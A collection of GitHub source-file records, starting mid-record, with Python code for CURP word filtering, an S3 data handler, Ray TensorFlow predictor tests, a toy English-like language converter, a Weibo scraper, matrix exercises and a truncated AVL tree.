\"KOJX\",\n \"CACA\": \"CACX\",\n \"KAKA\": \"KAKX\",\n \"CACO\": \"CACX\",\n \"KULO\": \"KULX\",\n \"CAGA\": \"CAGX\",\n \"MAME\": \"MAMX\",\n \"CAGO\": \"CAGX\",\n \"MAMO\": \"MAMX\",\n \"CAKA\": \"CAKX\",\n \"MEAR\": \"MEAX\",\n \"COGE\": \"COGX\",\n \"MEON\": \"MEOX\",\n \"COJA\": \"COJX\",\n \"MION\": \"MIOX\",\n \"COJE\": \"COJX\",\n \"MOCO\": \"MOCX\",\n \"COJI\": \"COJX\",\n \"MULA\": \"MULX\",\n \"COJO\": \"COJX\",\n \"PEDA\": \"PEDX\",\n \"CULO\": \"CULX\",\n \"PEDO\": \"PEDX\",\n \"FETO\": \"FETX\",\n \"PENE\": \"PENX\",\n \"GUEY\": \"GUEX\",\n \"PUTA\": \"PUTX\",\n \"JOTO\": \"JOTX\",\n \"PUTO\": \"PUTX\",\n \"KACA\": \"KACX\",\n \"QULO\": \"QULX\",\n \"KACO\": \"KACX\",\n \"RATA\": \"RATX\",\n \"KAGA\": \"KAGX\",\n \"RUIN\": \"RUIX\",\n \"KAGO\": \"KAGX\",\n}\n","repo_name":"hectorip/mxcurpy","sub_path":"mxcurpy/non_convenient_words.py","file_name":"non_convenient_words.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"jv","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2511964591","text":"# coding: utf-8\n\n\nimport boto3\n\nfrom rekcurd_dashboard.models import DataServerModel\nfrom .data_handler import DataHandler\n\n\nclass AwsS3Handler(DataHandler):\n \"\"\"AwsS3Handler\n \"\"\"\n def _initialize(self, data_server_model: DataServerModel):\n resource = boto3.resource(\n 's3',\n aws_access_key_id=data_server_model.aws_access_key,\n aws_secret_access_key=data_server_model.aws_secret_key,\n )\n bucket_name = data_server_model.aws_bucket_name\n return resource, bucket_name\n\n def download(self, data_server_model: DataServerModel, remote_filepath: str, local_filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Bucket(bucket_name).download_file(remote_filepath, local_filepath)\n\n def upload(self, data_server_model: DataServerModel, remote_filepath: str, local_filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Bucket(bucket_name).upload_file(local_filepath, remote_filepath)\n\n def delete(self, data_server_model: DataServerModel, filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Object(bucket_name, filepath).delete()\n","repo_name":"rekcurd/dashboard","sub_path":"rekcurd_dashboard/data_servers/aws_s3_handler.py","file_name":"aws_s3_handler.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"86"} +{"seq_id":"23567732464","text":"import re\nfrom typing import Tuple\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport tensorflow as tf\n\nfrom ray.air.constants import MAX_REPR_LENGTH\nfrom ray.air.util.data_batch_conversion import (\n _convert_batch_type_to_pandas,\n _convert_pandas_to_batch_type,\n)\nfrom ray.data.preprocessor import Preprocessor\nfrom ray.train.predictor import TYPE_TO_ENUM\nfrom ray.train.tensorflow import TensorflowCheckpoint, TensorflowPredictor\nfrom ray.train.tests.dummy_preprocessor import DummyPreprocessor\n\n\ndef build_raw_model() -> tf.keras.Model:\n model = tf.keras.Sequential(\n [\n tf.keras.layers.InputLayer(input_shape=()),\n # Add feature dimension, expanding (batch_size,) to (batch_size, 1).\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(1),\n ]\n )\n return model\n\n\nweights = [np.array([[2.0]]), np.array([0.0])]\n\n\ndef build_model() -> tf.keras.Model:\n model = build_raw_model()\n model.set_weights(weights)\n return model\n\n\ndef build_model_multi_input() -> tf.keras.Model:\n input1 = tf.keras.layers.Input(shape=(1,), name=\"A\")\n input2 = tf.keras.layers.Input(shape=(1,), name=\"B\")\n output = tf.keras.layers.Add()([input1, input2])\n model = tf.keras.models.Model(inputs=[input1, input2], outputs=output)\n return model\n\n\ndef build_model_multi_output() -> tf.keras.Model:\n input = tf.keras.layers.Input(shape=1)\n model = tf.keras.models.Model(inputs=input, outputs={\"a\": input, \"b\": input})\n return model\n\n\ndef build_model_unsupported() -> tf.keras.Model:\n \"\"\"Builds a model with unsupported output type.\"\"\"\n input = tf.keras.layers.Input(shape=1)\n model = tf.keras.models.Model(inputs=input, outputs=[input, input])\n return model\n\n\ndef test_repr():\n predictor = TensorflowPredictor(model=build_model())\n\n representation = repr(predictor)\n\n assert len(representation) < MAX_REPR_LENGTH\n pattern = re.compile(\"^TensorflowPredictor\\\\((.*)\\\\)$\")\n assert pattern.match(representation)\n\n\ndef create_checkpoint_preprocessor() -> Tuple[TensorflowCheckpoint, Preprocessor]:\n preprocessor = DummyPreprocessor()\n checkpoint = TensorflowCheckpoint.from_model(\n build_model(), preprocessor=preprocessor\n )\n\n return checkpoint, preprocessor\n\n\ndef test_init():\n checkpoint, preprocessor = create_checkpoint_preprocessor()\n\n predictor = TensorflowPredictor(model=build_model(), preprocessor=preprocessor)\n\n checkpoint_predictor = TensorflowPredictor.from_checkpoint(checkpoint)\n\n assert checkpoint_predictor._model.get_weights() == predictor._model.get_weights()\n assert checkpoint_predictor.get_preprocessor() == predictor.get_preprocessor()\n\n\ndef test_tensorflow_checkpoint():\n model = build_model()\n model.build(input_shape=(1,))\n preprocessor = DummyPreprocessor()\n\n checkpoint = TensorflowCheckpoint.from_model(model, preprocessor=preprocessor)\n assert checkpoint.get_model().get_weights() == model.get_weights()\n\n with checkpoint.as_directory() as path:\n checkpoint = TensorflowCheckpoint.from_directory(path)\n checkpoint_preprocessor = checkpoint.get_preprocessor()\n assert checkpoint.get_model().get_weights() == model.get_weights()\n assert checkpoint_preprocessor == preprocessor\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_array(use_gpu):\n predictor = TensorflowPredictor(model=build_model(), use_gpu=use_gpu)\n\n data_batch = np.asarray([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 1\n # [1 2 3] returns [[2],[4],[6]] with shape: (3,1) from Tensorflow model\n np.testing.assert_array_equal(\n predictions[\"predictions\"], np.asarray([[2], [4], [6]])\n )\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_array_with_preprocessor(use_gpu):\n preprocessor = DummyPreprocessor()\n predictor = TensorflowPredictor(\n model=build_model(),\n preprocessor=preprocessor,\n use_gpu=use_gpu,\n )\n\n data_batch = np.array([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 1\n # [1 2 3] returns [[2],[4],[6]] with shape: (3,1) from Tensorflow model\n np.testing.assert_array_equal(\n predictions[\"predictions\"], np.asarray([[2], [4], [6]])\n )\n assert predictor.get_preprocessor().has_preprocessed\n\n\n@pytest.mark.parametrize(\"batch_type\", [np.ndarray, pd.DataFrame, dict])\ndef test_predict(batch_type):\n predictor = TensorflowPredictor(model=build_model_multi_input())\n\n raw_batch = pd.DataFrame({\"A\": [0.0, 0.0, 0.0], \"B\": [1.0, 2.0, 3.0]})\n data_batch = _convert_pandas_to_batch_type(raw_batch, type=TYPE_TO_ENUM[batch_type])\n raw_predictions = predictor.predict(data_batch)\n predictions = _convert_batch_type_to_pandas(raw_predictions)\n\n assert len(predictions) == 3\n assert predictions.to_numpy().flatten().tolist() == [1.0, 2.0, 3.0]\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_dataframe(use_gpu):\n predictor = TensorflowPredictor(model=build_model_multi_input(), use_gpu=use_gpu)\n\n data_batch = pd.DataFrame({\"A\": [0.0, 0.0, 0.0], \"B\": [1.0, 2.0, 3.0]})\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 3\n assert predictions.to_numpy().flatten().tolist() == [1.0, 2.0, 3.0]\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_multi_output(use_gpu):\n predictor = TensorflowPredictor(model=build_model_multi_output(), use_gpu=use_gpu)\n\n data_batch = np.array([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n # Model outputs two tensors\n assert len(predictions) == 2\n for k, v in predictions.items():\n # Each tensor is of size 3\n assert len(v) == 3\n assert v.flatten().tolist() == [1, 2, 3]\n\n\ndef test_predict_unsupported_output():\n \"\"\"Tests predictions with models that have unsupported output types.\"\"\"\n predictor = TensorflowPredictor(model=build_model_unsupported())\n\n data_batch = np.array([1, 2, 3])\n # Unsupported output should fail\n with pytest.raises(ValueError):\n predictor.predict(data_batch)\n\n # Using a CustomPredictor should pass.\n class CustomPredictor(TensorflowPredictor):\n def call_model(self, tensor):\n model_output = super().call_model(tensor)\n return {str(i): model_output[i] for i in range(len(model_output))}\n\n predictor = CustomPredictor(model=build_model_unsupported())\n predictions = predictor.predict(data_batch)\n\n # Model outputs two tensors\n assert len(predictions) == 2\n for k, v in predictions.items():\n # Each tensor is of size 3\n assert len(v) == 3\n assert v.flatten().tolist() == [1, 2, 3]\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.exit(pytest.main([\"-v\", \"-x\", __file__]))\n","repo_name":"ray-project/ray","sub_path":"python/ray/train/tests/test_tensorflow_predictor.py","file_name":"test_tensorflow_predictor.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"3868601533","text":"from collections import defaultdict\nfrom itertools import combinations\nm,n = list(map(int,input().split()))\ndata = []\nfor i in range(m):\n temp = list(map(int,input().split()))\n data.append(temp)\ndx = [0,1,0,-1]\ndy = [1,0,-1,0]\npos = 0\nused = [[0]*n for i in range(m)]\nres = []\nx = 0\ny = 0\nfor i in range(m*n):\n res.append(data[x][y])\n used[x][y] = 1\n a = dx[pos] + x\n b = dy[pos] + y\n if a<0 or b<0 or a>=m or b>=n or used[a][b]:\n pos=(pos+1)%4\n x = dx[pos] + x\n y = dy[pos] + y\n else:\n x = a\n y = b\nlast = m*n-1\nfor i in range(m*n):\n if i == last:\n print(res[i])\n else:\n print(res[i],end=',')\n","repo_name":"HotView/PycharmProjects","sub_path":"Exercise_for_Job/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"12892150097","text":"import os\nimport re\nfrom datetime import datetime\n\n\n# The EngLangConverter class contains static methods for converting code written in a custom\n# English-like language to Python syntax.\nclass EngLangConverter:\n @staticmethod\n def convert(code):\n \"\"\"\n The function converts a given code from a custom English-like language to Python.\n\n :param code: a string containing the code to be converted from English-like syntax to Python\n syntax\n :return: The `convert` method is returning a string that represents the converted code.\n \"\"\"\n code = code.replace(\"PROGRAM\", \"\").replace(\"END PROGRAM\", \"\").strip()\n code = EngLangConverter.replace_import(code)\n code = EngLangConverter.replace_init(code)\n code = EngLangConverter.replace_class_with_indent(code)\n code = EngLangConverter.replace_function_with_indent(code)\n # code = EngLangConverter.convert_keywords(code)\n code = EngLangConverter.convert_set_statements(code)\n code = EngLangConverter.convert_if_statements(code)\n code = EngLangConverter.convert_while_statements(code)\n code = EngLangConverter.convert_for_statements(code)\n code = EngLangConverter.convert_comparison_statements(code)\n code = EngLangConverter.convert_arithmetic_ops(code)\n code = EngLangConverter.replace_display(code)\n code = EngLangConverter.replace_new_and_return_and_end(code)\n code = EngLangConverter.convert_variables_to_type(code)\n\n lines = code.split(\"\\n\")\n output_lines = []\n\n for line in lines:\n if line.startswith(\" \"):\n line = line[4:]\n if line.strip() == \"\" and output_lines and output_lines[-1].strip() == \"\":\n continue\n output_lines.append(line)\n\n return \"\\n\".join(output_lines)\n\n @staticmethod\n def get_program_name(code):\n \"\"\"\n The function extracts the name of a program from a given code.\n\n :param code: a string that represents the source code of a program written\n in a programming language.\n :return: the program name as a string, or None if not found.\n \"\"\"\n print(\"[ EngLang Compiler] Getting program name...\")\n program_line = code.split(\"\\n\")[0]\n program_name = program_line.replace(\"PROGRAM\", \"\").strip()\n return program_name if program_name else None\n\n @staticmethod\n def replace_import(code):\n \"\"\"\n This function replaces \"IMPORT\" statements in Python code with \"from [module] import *\".\n\n :param code: a string containing the code to be compiled\n :return: the modified code with import statements replaced using regular expression.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing import statements...\")\n return re.sub(r\"IMPORT (.+)\", r\"from \\1 import *\", code)\n\n @staticmethod\n def replace_init(code):\n \"\"\"\n This function replaces \"INIT\" statements in a given code with a Python class constructor\n \"__init__\" statement.\n\n :param code: a string containing the code to be compiled\n :return: the modified code with the \"INIT\" statements replaced with a Python class constructor\n \"__init__\" method.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing init statements...\")\n return re.sub(r\"INIT (.+)\", r\"def __init__(self, \\1):\", code)\n\n @staticmethod\n def replace_class_with_indent(code):\n \"\"\"\n This function replaces \"CLASS\" statements with \"class\" and removes \"END CLASS\" in a given code.\n\n :param code: The input code that needs to be processed and have class statements replaced with\n Python syntax\n :return: the modified code with the class statements replaced with Python syntax.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing class statements...\")\n return re.sub(r\"CLASS (.+)\", r\"class \\1:\", code).replace(\"END CLASS\", \"\")\n\n @staticmethod\n def replace_function_with_indent(code):\n \"\"\"\n The function replaces function statements in a given code with properly indented Python function\n definitions.\n\n :param code: a string containing the code to be processed and modified by the function\n :return: the modified code with the function statements replaced with Python function\n definitions.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing function statements...\")\n functions_re = r\"(FUNCTION (.+) TAKES (.+)([\\s\\S]+?))(?=FUNCTION|END PROGRAM)\"\n function_definitions = re.findall(functions_re, code)\n\n for function_block, function, parameters, function_body in function_definitions:\n inside_class = re.search(\"class [\\s\\S]+?\" + function_block, code)\n new_parameters = f\"self, {parameters}\" if inside_class else parameters\n new_function = f\"def {function}({new_parameters}):\"\n code = code.replace(function_block, new_function + function_body)\n\n return code\n\n @staticmethod\n def convert_keywords(code):\n \"\"\"\n This function converts keywords in a given code to Python syntax.\n\n :param code: a string containing the code to be processed and modified by the function\n :return: the modified code with the keywords replaced with Python syntax.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting keywords...\")\n code.replace(\"AND\", \"and\").replace(\"OR\", \"or\").replace(\"IN\", \"in\")\n code.replace(\"NOT\", \"not\").replace(\"TRUE\", \"True\").replace(\"FALSE\", \"False\")\n return\n\n @staticmethod\n def convert_set_statements(code):\n \"\"\"\n This function converts \"SET\" statements in code to variable assignments in Python.\n\n :param code: The code parameter is a string that represents a block of code that may contain\n \"SET\" statements\n :return: the modified code with the \"SET\" statements replaced with variable assignments.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting set statements...\")\n return re.sub(r\"SET (.+) TO \", r\"\\1 = \", code)\n\n @staticmethod\n def convert_if_statements(code):\n \"\"\"\n This function converts IF statements in a given code string to Python syntax.\n\n :param code: a string containing code written in a language that uses \"IF\", \"THEN\", \"ELSE\", and\n \"END IF\" statements\n :return: the modified code with if statements converted to Python syntax.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting if statements...\")\n code = re.sub(r\"IF (.*) THEN\", r\"if \\1:\", code)\n code = code.replace(\"ELSE\", \"else:\")\n return code.replace(\"END IF\", \"\")\n\n @staticmethod\n def convert_while_statements(code):\n \"\"\"\n This function converts WHILE statements in a given code string to Python syntax.\n\n :param code: a string containing code written in a language that uses \"WHILE\" and \"END WHILE\"\n statements\n :return: the modified code with while statements converted to Python syntax.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting while statements...\")\n return re.sub(r\"WHILE (.*)\", r\"while \\1:\", code).replace(\"END WHILE\", \"\")\n\n @staticmethod\n def convert_for_statements(code):\n \"\"\"\n This function converts FOR statements in a given code string to Python syntax.\n\n :param code: a string containing code written in a language that uses \"FOR\" and \"END FOR\"\n statements\n :return: the modified code with for statements converted to Python syntax.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting for statements...\")\n code.replace(\" DO\", \"\")\n return re.sub(r\"FOR (.*)\", r\"for \\1:\", code).replace(\"END FOR\", \"\")\n\n @staticmethod\n def convert_comparison_statements(code):\n \"\"\"\n The function replaces comparison statements in a given code with their corresponding symbols.\n\n :param code: a string containing the code to be modified\n :return: the modified code with the comparison statements replaced with their corresponding\n symbols.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing comparison statements...\")\n re.sub(r\"IS GREATER THAN\", \">\", code)\n re.sub(r\"IS LESS THAN\", \"<\", code)\n re.sub(r\"IS GREATER THAN OR EQUAL TO\", \">=\", code)\n re.sub(r\"IS LESS THAN OR EQUAL TO\", \"<=\", code)\n return re.sub(r\"IS NOT EQUAL TO\", \"!=\", code)\n\n @staticmethod\n def convert_arithmetic_ops(code):\n \"\"\"\n This function converts the words \"PLUS\" and \"MINUS\" in a given code string to their\n corresponding arithmetic operators \"+\" and \"-\".\n\n :param code: a string containing code that needs to be compiled and converted\n :return: the modified code with the arithmetic operations converted from their English language\n equivalents (\"PLUS\" and \"MINUS\") to their corresponding mathematical symbols (\"+\" and \"-\").\n \"\"\"\n print(\"[ EngLang Compiler ] Converting arithmetic operations...\")\n code = re.sub(r\"PLUS\", \"+\", code)\n code = re.sub(r\"MINUS\", \"-\", code)\n code = re.sub(r\"TIMES\", \"*\", code)\n code = re.sub(r\"DIVIDED BY\", \"/\", code)\n code = re.sub(r\"MODULO\", \"%\", code)\n return re.sub(r\"TO THE POWER OF\", \"**\", code)\n\n @staticmethod\n def replace_display(code):\n \"\"\"\n This function replaces \"DISPLAY\" statements in code with \"print\" statements.\n\n :param code: The code parameter is a string that represents a program written in a programming\n language. The function is designed to replace any display statements in the code with print\n statements\n :return: the modified code with the display statements replaced with print statements.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing display statements...\")\n return re.sub(r\"DISPLAY ?(.+)\", r\"print(\\1)\", code)\n\n @staticmethod\n def replace_new_and_return(code):\n \"\"\"\n The function replaces \"NEW\" statements with empty parentheses and \"RETURN\" statements with\n \"return\", removes \"END FUNCTION\" statements, and replaces \"JOIN\" statements with \"+\".\n\n :param code: a string containing the code to be processed and modified\n :return: the modified code with \"NEW\" statements replaced with function calls, \"RETURN\"\n statements replaced with \"return\" keyword, \"END FUNCTION\" removed, and \"JOIN\" replaced with \"+\".\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing new and return statements...\")\n code = re.sub(r\"NEW (.+)\\(\\)\", r\"\\1()\", code)\n code = code.replace(\"RETURN\", \"return\").replace(\"END FUNCTION\", \"\")\n return code.replace(\"JOIN\", \"+\")\n\n @staticmethod\n def replace_new_and_return_and_end(code):\n \"\"\"\n The function replaces certain statements in a given code string and returns the modified string.\n\n :param code: a string containing the code to be processed and modified\n :return: The modified code with \"NEW\" statements replaced with function calls, \"RETURN\"\n statements replaced with \"return\" keyword, \"END FUNCTION\" removed, \"JOIN\" replaced with \"+\",\n and \"END\" removed.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing new and return and end statements...\")\n code = re.sub(r\"NEW (.+)\\(\\)\", r\"\\1()\", code)\n code = code.replace(\"RETURN\", \"return\").replace(\"END FUNCTION\", \"\")\n return code.replace(\"JOIN\", \"+\").replace(\"END\", \"\")\n\n @staticmethod\n def convert_variables_to_type(code):\n \"\"\"\n The function converts variables in a given code to a specified data type.\n\n :param code: a string containing the code to be compiled\n :return: the modified code with variables converted to their specified data types.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting variables to type...\")\n conversions = re.findall(r\"([\\w_]+?)\\s+TO\\s+(STRING|INT|FLOAT)\", code)\n for variable, data_type in conversions:\n if data_type == \"STRING\":\n conversion_func = \"str\"\n elif data_type == \"INT\":\n conversion_func = \"int\"\n elif data_type == \"FLOAT\":\n conversion_func = \"float\"\n code = code.replace(\n f\"{variable} TO {data_type}\", f\"{conversion_func}({variable})\"\n )\n return code\n\n\ndef main():\n \"\"\"\n This function prompts the user for an EngLang file location, author name, and license name, converts\n the EngLang code to Python code using EngLangConverter, writes the Python code to a file with\n metadata, and optionally runs the generated code.\n \"\"\"\n print(\"Welcome to MostlyWhat's EngLang Compiler!\")\n file_location = input(\"Enter the EngLang file location (.enlg): \")\n author = input(\"Enter the code author's name: \")\n file_license = input(\"Enter the license name: \")\n\n with open(file_location, \"r\") as f:\n englang_code = f.read()\n\n converter = EngLangConverter()\n program_name = converter.get_program_name(englang_code)\n python_code = converter.convert(englang_code)\n\n output_folder = \"./output/\"\n output_filename = f\"{program_name.lower()}.py\"\n output_file = os.path.join(output_folder, output_filename)\n\n compiler_name = \"MostlyWhat's EngLang Compiler\"\n language = \"EngLang\"\n\n current_date = datetime.now().strftime(\"%Y-%m-%d\")\n with open(output_file, \"w\") as f:\n f.write(\n f\"# Name: {program_name.title()}\\n# Author: {author}\\n# Language: {language}\\n# Compiled: {current_date}\\n# Compiler: {compiler_name}\\n# License: {file_license}\\n\\n\"\n )\n f.write(python_code)\n\n print(f\"\\nGenerated Python file: {output_file}\")\n\n run_code = input(\"\\nDo you want to run the generated code? [y/n]: \")\n if run_code.lower() == \"y\":\n os.system(f\"python {output_file}\")\n\n\n# `if __name__ == \"__main__\":` is a common Python idiom that checks whether the current script is\n# being run as the main program or if it is being imported as a module into another program. If the\n# script is being run as the main program, the `main()` function is called, which is the entry point\n# of the program. If the script is being imported as a module, the `main()` function is not called\n# automatically.\nif __name__ == \"__main__\":\n main()\n","repo_name":"MostlyWhat/EngLang","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"11834947824","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 引入库\ndef getPage(url):#获取链接中的网页内容\n headers = {\n \"X-Infinitescroll\": \"true\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n }\n return requests.get(url=url, headers=headers).content\n# 每页用户数为10 num为爬取开始页面\nnum=1\nuser = {}\nwhile(True):\n page = getPage('https://weibo.cn/pub/top?cat=star&page=%d'%num)\n # 将基础网址和页数拼接得到实际网址,使用request的get方法获取响应,再用content方法得到内容\n soup = BeautifulSoup(page,'lxml')\n # 使用BeautifulSoup分析页面,这里并没有指定解析器,会自动选取可获得的最优解析器\n # BeautifulSoup会报一个warning要你选择解析器,可以忽略\n for i in soup.select(\".nk\"):\n user[i.get_text()] = i.get('href')\n num+=1\n if(num==11):\n break\n\nview={}\nfor key,value in user.items():\n tempsoup=BeautifulSoup(getPage(value),\"lxml\")\n temstr=\"\"\n for i in tempsoup.select('.c .ctt'):\n temstr+=i.get_text()+'\\n'\n view[key]=temstr\nfor key,value in view.items():\n try:\n f = open(key+'.txt','w', encoding='utf-8')\n f.write(key + '\\n' + value)\n finally:\n if f:\n f.close()\n","repo_name":"Demon-Wang/hw2","sub_path":"殷旺/weibo_ crawler.py","file_name":"weibo_ crawler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"28264249305","text":"n = int(input())\nwhile(n != 0):\n matriz = []\n\n\n #preenchendo a primeira linha da matriz\n lista = []\n lista.append(1)\n for i in range(1, n):\n calculo = 2 ** i\n lista.append(calculo)\n\n matriz.append(lista)\n\n for i in range(1, n):\n lista = []\n for j in range(0, n):\n if (j == 0):\n lista.append(matriz[i-1][1])\n else:\n calculo = matriz[i-1][j] * 2\n lista.append(calculo)\n matriz.append(lista)\n\n ultimoElemento = len(str(matriz[n-1][n-1]))\n\n for i in range(0, n, 1):\n for j in range(0, n, 1):\n if(j==n-1):\n print(\"{:>{}d}\".format(matriz[i][j], ultimoElemento), end = \"\")\n else:\n print(\"{:>{}d}\".format(matriz[i][j], ultimoElemento), end = \" \")\n print()\n print()\n n = int(input())\n","repo_name":"oliveiraeverton/uri","sub_path":"1557.py","file_name":"1557.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37722959057","text":"import pandas as pd\nimport graphviz \nimport pydot\n#Clase para crear nodos\nclass TreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.price = data[\"price\"]\n self.surface_total = data[\"surface_total\"]\n self.bedrooms = data[\"bedrooms\"]\n self.metric = self.calculate_metric()\n self.level = 1\n self.parent = None\n self.grandparent = None\n\n #Funcion para calcular la metrica\n def calculate_metric(self):\n return self.price / self.surface_total if self.surface_total != 0 else 0\n #Funcion para insertar un nodo, calcular el nivel, balancear y asignar nodo padre y abuelo.\n #Se utiliza el numero de cuartos como metrica secundaria para balancear el arbol\n def insert_node(self, data):\n if self.data.empty:\n self.data = data\n return\n\n metric = data[\"price\"] / data[\"surface_total\"]\n if metric < self.metric:\n if self.left:\n self.left.insert_node(data)\n else:\n self.left = TreeNode(data)\n elif metric > self.metric:\n if self.right:\n self.right.insert_node(data)\n else:\n self.right = TreeNode(data)\n else:\n if data[\"bedrooms\"] < self.bedrooms:\n if self.left:\n self.left.insert_node(data)\n else:\n self.left = TreeNode(data)\n else:\n if self.right:\n self.right.insert_node(data)\n else:\n self.right = TreeNode(data)\n\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n self.parent = self\n self.grandparent = self.parent\n\n balance = self.get_balance()\n\n if balance > 1 and metric < self.left.metric:\n return self.rotate_right()\n\n if balance < -1 and metric > self.right.metric:\n return self.rotate_left()\n\n if balance > 1 and metric > self.left.metric:\n self.left = self.left.rotate_left()\n return self.rotate_right()\n\n if balance < -1 and metric < self.right.metric:\n self.right = self.right.rotate_right()\n return self.rotate_left()\n\n return self\n #funcion para insertar un nodo y graphicar el arbol\n def insert_new(self, data):\n if self.data.empty:\n self.data = data\n return\n\n metric = data[\"price\"] / data[\"surface_total\"]\n if metric < self.metric:\n if self.left:\n self.left.insert_new(data)\n else:\n self.left = TreeNode(data)\n elif metric > self.metric:\n if self.right:\n self.right.insert_new(data)\n else:\n self.right = TreeNode(data)\n else:\n if data[\"bedrooms\"] < self.bedrooms:\n if self.left:\n self.left.insert_new(data)\n else:\n self.left = TreeNode(data)\n else:\n if self.right:\n self.right.insert_new(data)\n else:\n self.right = TreeNode(data)\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n self.parent = self\n self.grandparent = self.parent\n\n # renderiza el arbol\n self.render_tree_graph()\n\n#Funcion para eliminar un nodo y balancear el arbol despues de eliminado.\n def delete_node(self, metric):\n if not self.data:\n return self\n\n if metric < self.metric:\n if self.left:\n self.left = self.left.delete_node(metric)\n elif metric > self.metric:\n if self.right:\n self.right = self.right.delete_node(metric)\n else:\n if not self.left:\n return self.right\n elif not self.right:\n return self.left\n else:\n successor = self.right.get_minimum_node()\n self.data = successor.data\n self.right = self.right.delete_node(successor.metric)\n\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n balance = self.get_balance()\n\n if balance > 1 and self.right and metric < self.left.metric:\n return self.rotate_right()\n\n if balance < -1 and self.left and metric > self.right.metric:\n return self.rotate_left()\n\n if balance > 1 and self.right and metric > self.left.metric:\n self.left = self.left.rotate_left()\n return self.rotate_right()\n\n if balance < -1 and self.left and metric < self.right.metric:\n self.right = self.right.rotate_right()\n return self.rotate_left()\n\n return self\n#Funcion para buscar un nodo\n def search_node(self, metric):\n if self.metric == metric:\n return self.data\n\n if metric < self.metric and self.left:\n return self.left.search_node(metric)\n elif metric > self.metric and self.right:\n return self.right.search_node(metric)\n\n return None\n#Funcion para obtener el nodo mas bajo\n def get_minimum_node(self):\n current = self\n while current.left:\n current = current.left\n return current\n#funcion para obtener el balance\n def get_balance(self):\n return self.get_height(self.left) - self.get_height(self.right)\n#funcion para rotar el arbol a la izquierda\n def rotate_left(self):\n y = self.right\n T2 = y.left\n\n y.left = self\n self.right = T2\n\n self.metric = self.calculate_metric()\n y.metric = y.calculate_metric()\n\n self.level = self.calculate_level()\n y.level = y.calculate_level()\n\n return y\n#funcion para rotar el arbol a la derecha\n def rotate_right(self):\n x = self.left\n T2 = x.right\n \n x.right = self\n self.left = T2\n \n self.metric = self.calculate_metric()\n x.metric = x.calculate_metric()\n \n self.level = self.calculate_level()\n x.level = x.calculate_level()\n \n return x\n#funciones para obtener la altura, calcular el nivel del arbol y devolverlo\n def get_height(self, node):\n if not node:\n return 0\n return 1 + max(self.get_height(node.left), self.get_height(node.right))\n \n def calculate_level(self):\n return 1 + max(self.get_level(self.left), self.get_level(self.right))\n \n def get_level(self, node):\n if not node:\n return 0\n return node.level\n #Funcion para buscar nodos con metricas\n def search_nodes_with_metrics(self, metrics):\n result = []\n self._search_nodes_with_metrics(metrics, result)\n return result\n#funcion recursiva para buscar nodos\n def _search_nodes_with_metrics(self, metrics, result):\n if self.metric == metrics[0]:\n if len(metrics) == 1:\n result.append(self.data)\n else:\n self._search_nodes_with_metrics(metrics[1:], result)\n\n if self.left and self.metric >= metrics[0]:\n self.left._search_nodes_with_metrics(metrics, result)\n\n if self.right and self.metric <= metrics[0]:\n self.right._search_nodes_with_metrics(metrics, result)\n #Funcion para imprimir el orden del nivel\n def print_level_order(self):\n height = self.get_height(self)\n for level in range(1, height + 1):\n self._print_current_level(self, level)\n#Funcion para imprimir el nivel actual\n def _print_current_level(self, node, level):\n if node is None:\n return\n if level == 1:\n print(node.data)\n elif level > 1:\n self._print_current_level(node.left, level - 1)\n self._print_current_level(node.right, level - 1)\n #funciones para encontrar nodo padre, abuelo y tio\n def find_father(self):\n return self.parent\n\n def find_grandfather(self):\n return 